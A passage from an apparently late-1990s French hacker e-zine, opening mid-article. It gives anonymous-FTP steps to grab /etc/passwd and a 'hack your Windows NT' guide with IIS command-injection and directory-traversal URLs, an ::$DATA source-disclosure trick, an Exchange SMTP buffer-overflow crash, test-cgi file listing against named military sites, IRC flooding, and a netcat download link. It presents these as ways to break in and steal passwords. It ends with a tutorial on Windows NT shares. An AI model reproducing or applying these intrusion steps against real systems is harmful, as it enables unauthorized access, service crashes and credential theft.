Ensuite tapez:

QUOTE pass ftp

*You're logged in:
ftp>

Voila, vous êtes connecté, maintenant, il
ne vous reste qu'à aller chercher le password 
file en tappant exemple (passwd est dans /etc):

get etc/passwd

Et voilà, vous avez la liste de tous les 
logins et passwords, amusez-vous...

                                  {Sliver}

************************************************************
=-=-=-=-=-=-=-=- 11. Hacker son windows NT -=-=-=-=-=-=-=-=-
************************************************************

***************************
**                       **
** Hacker son windows NT **
**                       **
**            (c) putois **
***************************

Well, encore une doc, et oui encore une, qui
va essayer d'expliquer comment hacker un windows NT
sans cette affreux NBTSTAT, que l'on retrouve 
partout et à force ca devient lassant.

Note sur nbtstat:
-----------------
Il est dit nul part que pour mener à bien cette 
mission il faut executer la commande CMD sous le 
shell de NT, pour pouvoir se servir du Net View.

On peut évidemment tapper net start pour lancer les 
services du netbios etc.. De plus le nbtstat est 
utiliser sur les ports: 137, 138, 139.

Windows NT en local:
--------------------
Pour le cas que vous êtes stagiaire, et que vous 
avez votre login sur une partie du réseau du centre,

1. Ya qu'a savoir si ils ont accès sur le web, et 
   d'essayer si ca marche en telnet ya qu'a se brancher 
   avec son compte.
2. Ya qu'a regarder dans \windows\profiles\ si ya pas 
   les noms d'utilisateurs dans les repertoires, si oui 
   placez-vous dans un repertoire et faites exit. La machine 
   redemarre le bureau sous le nom d'utilisateur choisi.
3. Pour cracker les pwl ya qu'a se démerder et chercher un
   programme au nom de GLIDE prévu à cet effet.

Sniffing:
---------
Méthode qui consiste à envoyer des paquets pour tracer un 
serveur. Exemple tracert ip, ou faite un tracert sur le 
cisco de la machine sur le port 11 et le systat donne toute 
les ip local.

Notes: Cisco = routeur.

Logiciel dispo: tout les portpro, portscan etc, et un autre 
au nom de ETHERPEEK (très bien celui-là y fait comme un linux ;))

Go to the Web:
--------------
La Methode IIS -> Internet Information Server

IIS v1.0:
---------
C'est pour le cas ou le directory des CGI s'appelle script soit par 
www.toto.com/cgi ou www.toto.com/script, cette méthode consiste à 
lister le directory du server et permet d'executer des commandes 
avec CMD.exe:

 /scripts/toto.bat?&dir+c:\+?&time
 /scripts/toto.cmd?&dir+c:\+?&time

Il existe sur les versions NT 3.0 et inferieur ou sur le tres grand 
réseau d'une université ou toute autre grosse merde militaire etc.

Et si ca marche? (oh joie!) Ben votre navigateur affiche le 
directory comme quand on mets c:\ dans le location, ou alors ca 
demande si on veut sauvegarder dans le blocnote.exe, et bien sur 
ca start une command dowload.

The syntax: /scripts/toto.bat?&COMMAND1+?&COMMAND2
----------
ISS Win NT 4.0
--------------

Crash Server: Marche en telnet sur le port 80 de l'ip distante
commande: GET ../ .. , et appuyez sur <ENTER>, ca marche sur 
tout ce qui est Proxy server. Ou autre merde genre moteur de 
recherche comme yahoo ,ya qu'a aller sur /cgi-bin/.. et si ca 
vous donne une erreur avec Content-type vous avez des chances!

Note: Pensez à respecter les espaces.

ISS Loopback:
------------

Fonctionne avec le ism.dll qui gère les passwords.

The syntax: /scripts/iisadmin/ism.dll?http/dir ou /_vti_bin/

Root directory et download: NT 4.0, IIS 1.0
---------------------------

Toujours du meme principe que le get ../ mais par le web cette fois qui 
permet d'avoir le c:\

http://www.domain.com/..\.. ou http://www.domain.com/scripts..\..\scriptname

Bat create: Win NT 4.0
-----------

/scripts/exploit.bat>PATH\target.bat

Crash Port 25: Microsoft Exchange Internet Mail Service  
-------------

Buffer overflow pour la version 5.5. 

1. faire un telnet sur le port 25 de l'ip distance et tapez helo aaaaaaaaaaa
   aaaaaaaaaaaaaaaaaaaaaaaaa etc pendant deux page et ...

2. helo blah.net . MAIL FROM: aaaaaaaaaaaaaaaaaaa etc

* Dis dans rootshell et bugtraq

250 mhs.jpl.nasa.gov G'day [194.xx.xx.xx]!  Why do you call yourself aaa? ;-)

Les fichiers ASP:
----------------

Default.asp: Telnet 80  IIS/4.0
-----------

GET /default.asp?cid=[*]&v=3086&pw=8F4272A6Fc6FDFDFAAD3B435B51404EE

Buffer overflow qui donne le password crypté: 8F4272A6Fc6FDFDFAAD3B435B51404EE

Asp source viewver:
-------------------

index.asp::$DATA  pour voir le source du asp 

Flooding:
---------
C'est le fait d'envoyer quelques centaines de mots pour déconnecter
une machine. Sur IRC tu prends dcc fuck tu va sur ircnet et t'envoie 
des /who *.jp hehe.

NT SYN:  Win NT 3.51, 4.0
-------
netstat -n -p tcp

NETCAT:
------

Bug plus connu sur les unix, beos, linux, etc permet de faire des ls par le 
port 80 avec un *.Exemple:www.navi.mil/cgi-bin/test-cgi * pour lister le
contenu du /cgi-bin/ , test-cgi /* pour lister le directory,
www.navy.mil/cgi-bin/test-cgi/ /*etc/* si tu veux te placer dans /etc,
www.navy.mil/cgi-bin/test-cgi /*/passwd pour une recherche de fichier.

Notes: Run only avec les netscape 3 et pas avec netscape 4 ie4 etc, moi j'ai
netscape 3us, ou trouver? go to www.filez.com et tape N16E comme mot clef

Mygale.org hacked on 97/98 by test-cgi le but etait simple yavais juste a
aller dans la création de compte et de taper password * et sa donnais la 
liste des users.Le meme effet s'est produit sur angelfire.com, meme principe
et chez.com. Enfin bref si vous avez un server de commande avec test-cgi vous
pouvez mettre toujours credit-cards * lol

Notes: un petit mot pour le netcat |nc removed.com , pour le telecharger,
aller sur: http://www.l0pht.com/users/10pht/nc11nt.zip d'apres eux on 
pourrait meme faire un cp et un mv ce qui pourrait etre interressant si on
pouvais deplacer un file vers une ip.


-----  *   *   ----
  -    *****   --
  -    *****   --
  -    *   *   ----     ENdS.      (c) putois


************************************************************
=-=-=-=-=-=-= 12. Hacker son windows NT #2 -=-=-=-=-=-=-=-=-
************************************************************

*****************************
**                         **
** Hacker son windows NT 2 **
**                         **
**              (c) putois **
*****************************

Bienvenu dans HackNT Numéro 2, celui-ci est dédié à voir 
comment fonctionne cet affreux nbtstat, sans le pratiquer 
mais voir comment marche cette faille, ce qui peut être 
toujours interressant.

Travaux Pratique:  Fait avec NT4 fr
-----------------

Dans le premier numéro de hackNT on a vu que le nbtstat 
fonctionnais sur les serveurs ou les ports 137,138,139 
(service du netbios, tcp et udp).

Comment créer sois meme la faille afin de pouvoir s'exercer sur son nt?
-----------------------------------------------------------------------

1. D'abord il faut créer un répertoire dans la racine du disque c:\ (ex:toto)

2. Ensuite, activez votre explorateur windows, placez-vous sur le repertoire
   toto, (1 seul clic), appuyez sur le bouton droit de la souris et choisissez
   l'option "PARTAGER", vous avez la une fenêtre qui apparait permettant de 
   définir les droits d'accès sur le repertoire. Cliquez sur "partager en tant 
   que" et choisissez par exemple lire, faites OK, puis Appliquer, et OK pour 
   quitter. A ce moment la une main bleue apparait dans l'explorateur qui 
   signifie que toto a bien été partagé.

Pour voir si l'opération s'est bien sous le shell de Ms-Dos tapez NET SHARE
pour donner les nom de partage local. Exemple pour ma machine:

Nom partage    Ressource         Remarque
---------------------------------------------------
IPC$                     	 IPC distant
c$		c:\	         Partage par defaut
ADMIN$		c:\winnt         Admin. distante
toto		c:\toto

Voila toto est maintenant le bug de nbtstat et on peut le retrouver dans la
liste du résultat avec l'option "recherche d'ordinateur".

Pour rajouter des remarque,toujours avec notre commande net share,tapez:

net share toto /remark:"toto"     

puis appuyez sur Enter et on a un gentil message qui s'affiche:

"La commande a été executée." 
Et quand l'on retape net share on a bien toto dans les remarques.

Nom partage    Ressource           Remarque
---------------------------------------------------
toto		c:\toto		    toto

Pour supprimer le partage faite:

net share toto /DELETE . Toto est donc enleve de la liste des partages.

Net view:
---------
Pour se servir de cette commande sous windows NT, il faut d'abord tapper
CMD sous le shell. Et sous 95..? Cannot run with msdos command ?? Ya qu'a
aller dos4gw ou dwsdpmi je sais plus.
Donc, après avoir taper CMD, celui-ci redemarre le shell de NT. Le role 
de CMD et de pouvoir visualiser les ressources partagées, sxemple:

net view \\corruption

Nom     Type     Local  Remarque
--------------------------------
toto   Disque
La commande a ete execute.  

Note: corruption est le nom de mon disque donne au formatage 
(pour les newbies).

Pour lister le contenu de toto: dir \\corruption\toto

(c) putois
 
************************************************************
=-=-=-=-=-=-=-=-=-=-=- 13. Fin du #3 =-=-=-=-=-=-=-=-=-=-=-=
************************************************************

  (¯`·.¸¸.·´¯)  
  |      ____|§§§¿   /¯\
   ¯¯¯§|§ ¿§§§§? §  / _ \
      §|§o§§§§o    * |_| * 
      §|§ ?§§§§§¿  |  _  |
  ____§|§____o§§§§o| |_| |_______
  ¯¯¯¯§|§¯§¯?§§§§?¯L_|¯L_|¯¯¯¯¯¯¯
      §|§ ?§§§§§?
      §|§          By |{night

Bon et bien, merci  de  nous avoir lu,  et j'espère que vous
avez appris quelquechose.  Si vous avez  des commentaires ou
des suggestions ils sont les bienvenues : tsarmy@hotmail.com
Je voudrais  encore  remercier putois pour  sa collaboration
dans ce e-zine.

[--------------------------- EOF --------------------------]

